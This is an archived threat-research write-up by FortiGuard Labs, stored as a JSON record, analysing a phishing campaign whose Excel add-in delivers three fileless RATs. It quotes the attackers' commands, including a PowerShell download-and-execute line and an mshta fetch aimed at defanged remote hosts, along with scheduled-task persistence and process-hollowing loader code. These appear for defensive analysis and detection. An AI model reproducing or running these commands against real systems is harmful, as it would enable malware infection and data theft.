{
	"id": "cb979888-bd97-4d9a-ab78-f98910fe42a1",
	"created_at": "2026-04-06T00:22:19.051456Z",
	"updated_at": "2026-04-10T03:21:32.011327Z",
	"deleted_at": null,
	"sha1_hash": "3c77997543ef67e002b55b07ac947eb52145a5cb",
	"title": "Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC – Part I | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 608007,
	"plain_text": "Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT /\r\nBitRAT / PandoraHVNC – Part I | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2022-05-12 · Archived: 2026-04-05 16:49:32 UTC\r\nFortinet’s FortiGuard Labs captured a phishing campaign that was delivering three fileless malware onto a victim’s device.\r\nOnce executed, they are able to steal sensitive information from that device.\r\nIn this analysis, I’ll reveal how the phishing campaign manages to transfer the fileless malware to the victim’s device, what\r\nmechanism it uses to load, deploy, and execute the fileless malware in the target process, and how it maintains persistence\r\non the victim’s device.\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Microsoft Windows Users\r\nImpact: Controls victim’s device and collects sensitive information\r\nSeverity level: Critical\r\nObserving the Phishing Email\r\nThe captured phishing email is shown in Figure 1.1. It was disguised as a notification of a payment report from a trusted\r\nsource. \r\nFigure 1.1 – The phishing email\r\nThis email attempts to trick the recipient into opening the attached Excel document for the report detail. As you can see, this\r\nphishing email is detected as spam by the FortiMail service and has been marked as “[SPAM detected by FortiMail]” in the\r\nSubject line to warn the recipient.\r\nLooking into the Attached Excel Document\r\nThe Excel document is named “Remittance-Details-951244.xlam”. It’s an Excel Add-In (*.xlam) file that contains malicious\r\nmacros. When the recipient starts it in the Microsoft Excel program, a security notice pops up asking the user if they want to\r\nenable the macros, as shown in Figure 2.1. \r\nhttps://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware\r\nPage 1 of 8\n\nFigure 2.1 – The security notice that launches when opening the Excel document\r\nIt contains an auto-start Macro that starts using a VBA (Visual Basic Application) method called “Auto_Open()” when the\r\nExcel file is opened.\r\nGoing through the VBA code inside the method, I learned that it decodes a command string and executes it using a WMI\r\n(Windows Management Instrumentation) object.\r\nFigure 2.2 – The WMI object used to execute a decoded command\r\nFigure 2.2 is a snippet of VBA code of the method “Auto_Open()”,  showing where it is about to create a WMI object to\r\nexecute the decoded string command “C:\\\\ProgramData\\\\ddond.com\r\nhxxps://taxfile[.]mediafire[.]com/file/6hxdxdkgeyq0z1o/APRL27[.]htm/file”,  as shown in the bottom of Figure 2.2.\r\nBefore that, it copies a local file, “C:\\Windows\\System32\\mshta.exe”, into “C:\\ProgramData\\” and renames it as\r\n“ddond.com”. “mshta.exe” is a Windows-native binary file designed to execute Microsoft HTML Application (HTA) files.\r\nRemember that “C:\\ProgramData\\ddond.com” is now the duplicate of “mshta.exe”, which will be used throughout the\r\ncampaign. To confuse researchers, for example, it uses the copied “ddond.com” file to download and execute the malicious\r\nhtml file rather than “mshta.exe”.\r\nHTML + JavaScript + PowerShell\r\nIt downloads the “APRL27.htm” file, which is parsed by “ddond.com” (i.e. “mshta.exe”). The HTML file contains a piece\r\nof JavaScript code that is encoded using the URL escape method. I decoded it and simplified the code, as shown in Figure\r\n3.1.\r\nhttps://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware\r\nPage 2 of 8\n\nFigure 3.1 - The simplified JavaScript code from APRL27.html\r\nIt creates an object, “Wscript.Shell”, using the instruction below. “Wscript.Shell” is retrieved using method\r\n“_0x5b4b3f(0x391, 0x391)”, which is used to return a string by its index.\r\nchuchukukukaokiwDasidow = new ActiveXObject(_0x5b4b3f(0x391, 0x391));\r\n“chuchukukukaokiwDasidow” is the created OS Shell object used to run an application. In Figure 3.1 we can see it runs five\r\ncommand-line applications, as follows.\r\npowershell  $MMMMMMM=((neW-ObjEcT ((\"Net.Webclient\"))).\r\n((\"Downloadstring\")).invoke(((\"hxxps[:]//taxfile[.]mediafire.com/file/175lr9wsa5n97x8/mainpw.dll/file\"))));Invoke-Expression $MMMMMMM\r\nschtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr \"\"\"%programdata%\\ddond.com \"\"\"\"\"\"\r\nhxxps[:]//www[.]mediafire.com/file/c3zcoq7ay6nql9i/back.htm/file\"\"\"\r\ntaskkill /f /im WinWord.exe\r\ntaskkill /f /im Excel.exe\r\ntaskkill /f /im POWERPNT.exe\r\nIt runs the PowerShell application to download a PowerShell file called “mainpw.dll” and then execute it.\r\nIt then runs schtasks to create a schedule task named “calendersw” in the system “Task Scheduler“. It performs the\r\ncommand “C:\\ProgramData\\ddond.com hxxps[:]//www[.]mediafire.com/file/c3zcoq7ay6nql9i/back.htm/file” every 82\r\nminutes, which looks like parsing “APRL27.html”. It is also a persistence mechanism. Once it starts, back.htm adds more\r\nscheduled tasks.\r\nIt also runs taskkill to kill processes, if existing, of MS Word (WinWord.exe), MS Excel (Excel.exe), and MS Pointpoint\r\n(POWERPNT.exe).\r\nhttps://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware\r\nPage 3 of 8\n\nFigure 3.2 – APRL27.htm traffic\r\nFigure 3.2 is the screenshot of an HTTP proxy program showing the packets from “APRL27.htm” to “mainpw.dll” marked\r\nin the red box. The green box (back.htm) and blue box (Start.htm) are other groups of requests from other “ddond.com”\r\ncommands started by the Task Scheduler.\r\nThe “mainpw.dll” file (size 7.58MB) is full of PowerShell code that can be split into three parts for three fileless malware.\r\nFigure 3.3 is a display of the simplified structure of “mainpw.dll”.\r\nhttps://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware\r\nPage 4 of 8\n\nFigure 3.3 – Outlines of the PowerShell code inside “mainpw.dll”\r\nThis code has three code segments and uses the same code logic for each malware. I’ll explain how this works for each\r\nmalware through their variables.\r\nThe first “$hexString” contains a dynamic method for performing GZip decompression.\r\nThe second “$hexString” contains dynamic PowerShell code that decompresses the malware payload and an inner\r\n.Net module file that deploys the malware payload. \r\nThe “$nona” is a huge byte array that contains the GZip-compressed malware payload. The following PowerShell\r\ncodes extracted from the second $hexString are used to decompress the malware payload in $nona and the inner .Net\r\nmodule for deploying the malware payload into two local variables.\r\n[byte[]] $RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH = Get-DecompressedByteArray $nona\r\n[byte[]] $RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG =Get-                       \r\nDecompressedByteArray $STRDYFUGIHUYTYRTESRDYUGIRI\r\nAt the end of each malware code segment, the code calls the “Load()” method to load the inner .Net module from\r\n“$RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG”. It then calls the Invoke() method to invoke the\r\n“projFUD.PA.Execute()” function of the inner .Net module with two parameters, which are an exe file’s full path and a\r\nfileless malware payload. Here is a piece of the PowerShell code used for the first malware.\r\n[Reflection.Assembly]::Load($RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG).GetType('projFUD.PA').GetMethod('Execute').Invoke($\r\n[object[]] (\r\n'C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\aspnet_compiler.exe',$RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH))\r\nDynamic .Net Module for Process Hollowing\r\nIt is the inner .Net module that is dynamically extracted from the second $hexString variable. Its function\r\n“projFUD.PA.Execute()” is called from PowerShell, where “projFUD” is the name space, “PA” is the class name, and\r\n“Execute()” is a member function of class “PA”. Figure 4.1 shows a debugger breaking at the entry of this function. \r\nhttps://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware\r\nPage 5 of 8\n\nFigure 4.1 – Break at the entry of function “projFUD.PA.Execute()”\r\nFrom the bottom, in the “Locals” variable sub-tab, we see the two passed parameters. It then performs process hollowing to\r\ninject the malware payload into a newly-created process of “aspnet_compiler.exe”.\r\nFigure 4.2 – Creating a suspended process\r\nThe “Execute()” function then calls the Windows API “CreateProcessA()” to create a process of “aspnet_compiler.exe” with\r\na Create Flag of 0x8000004. This is a combination of CREATE_NO_WINDOW and CREATE_SUSPENDED, as shown in\r\nFigure 4.2.\r\nNext, it allocates memory inside this process and deploys the malware payload data into it. It modifies the value at memory\r\naddress 0x7EFDE008, where it saves the process’ base address of PEB (Process Environment Block) and modifies the\r\nprocess’ registry to have its EIP (Extended Instruction Pointer) pointing to the copied malware payload. To finish, it needs to\r\ncall the API WriteProcessMemory() numerous times as well as the API Wow64SetThreadContext().\r\nAfter all the above steps have been completed, it finally calls the API ResumeThread() to have the process run the malware\r\npayload. Below is the code used for calling this API. “processInformation.ThreadHandle” is the thread handle of the newly\r\ncreated process.\r\nnum15 = (int)PA.LX99ujNZ7X3YScj6T4(PA.ResumeThread, PA.vgxYHnXuOV51G6NIu3(\"01001001011011100111011001101111011010110110010\r\nnew object[]\r\n                                {\r\nhttps://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware\r\nPage 6 of 8\n\nprocessInformation.ThreadHandle\r\n                                });\r\nConclusion\r\nIn this analysis, I explained how an Excel document attachment to a disguised phishing email is sent to a victim’s device and\r\nhow the malicious code inside the Excel document is automatically executed once opened by the recipient.\r\nI also showed how the VBA code leads to the access of a remote html file (APRL27.htm) using the copied “mshta.exe”\r\ncommand. This file contains malicious JavaScript code to be executed later. I also demonstrated how it performs persistence\r\nby adding tasks into the system “Task Scheduler” to remain in the victim’s device.\r\nI also explained how it obtains three fileless malware in a huge downloaded PowerShell file to bypass detection, and how\r\nthese are later deployed and executed inside the target processes through Process Hollowing. These three fileless malware\r\nare AveMariaRAT / BitRAT / PandoraHVNC.\r\nIn Part 2 of this analysis, I will focus on these three fileless malware to see what they do on the victim’s device, as well as\r\nwhat kind of data they are able to steal.\r\nFortinet Protections\r\nFortinet customers are already protected from this malware by FortiGuard’s Web Filtering,\r\nAntiVirus, FortiMail, FortiClient, FortiEDR services, and CDR (content disarm and reconstruction) services, as follows:\r\nAll relevant URLs have been rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe phishing email with its attached malicious Excel document can be disarmed by the FortiGuard CDR (content disarm\r\nand reconstruction) service.\r\nThe captured Excel sample, the downloaded html file, and the PowerShell file with three fileless malware payload files are\r\ndetected as \"VBA/Agent.DDON!tr\", \"JS/Agent.DDON!tr.dldr\", and \"PowerShell/Agent.e535!tr\" and are blocked by the\r\nFortiGuard Antivirus service.\r\nFortiEDR detects both the Excel file and the huge PowerShell file as malicious based on their behavior.\r\nIn addition to these protections, we suggest that organizations have their end users also go through the FREE NSE\r\ntraining: NSE 1 – Information Security Awareness. It includes a module on Internet threats that is designed to help end users\r\nlearn how to identify and protect themselves from phishing attacks.\r\nIOCs\r\nURLs:\r\nhxxps://taxfile[.]mediafire[.]com/file/6hxdxdkgeyq0z1o/APRL27[.]htm/file\r\nhxxps://www[.]mediafire[.]com/file/c3zcoq7ay6nql9i/back[.]htm/file\r\nhxxps://www[.]mediafire[.]com/file/jjyy2npmnhx6o49/Start[.]htm/file\r\nhxxps://taxmogalupupitpamobitola[.]blogspot[.]com/atom[.]xml\r\nSample SHA-256 Involved in the Campaign:\r\n[Remittance-Details-951244-1.xlam]\r\n8007BB9CAA6A1456FFC829270BE2E62D1905D5B71E9DC9F9673DEC9AFBF13BFC\r\n[APRL27.htm]\r\nD71ADD25520799720ADD43A5F4925B796BEA11BF55644990B4B9A70B7EAEACBA\r\n[mainpw.dll]\r\n3D71A243E5D9BA44E3D71D4DA15D928658F92B2F0A220B7DEFE0136108871449\r\nRead Part II of this analysis here. \r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security\r\nSubscriptions and Services portfolio.\r\nhttps://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware\r\nPage 7 of 8\n\nSource: https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware\r\nhttps://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware"
	],
	"report_names": [
		"phishing-campaign-delivering-fileless-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434939,
	"ts_updated_at": 1775791292,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3c77997543ef67e002b55b07ac947eb52145a5cb.pdf",
		"text": "https://archive.orkl.eu/3c77997543ef67e002b55b07ac947eb52145a5cb.txt",
		"img": "https://archive.orkl.eu/3c77997543ef67e002b55b07ac947eb52145a5cb.jpg"
	}
}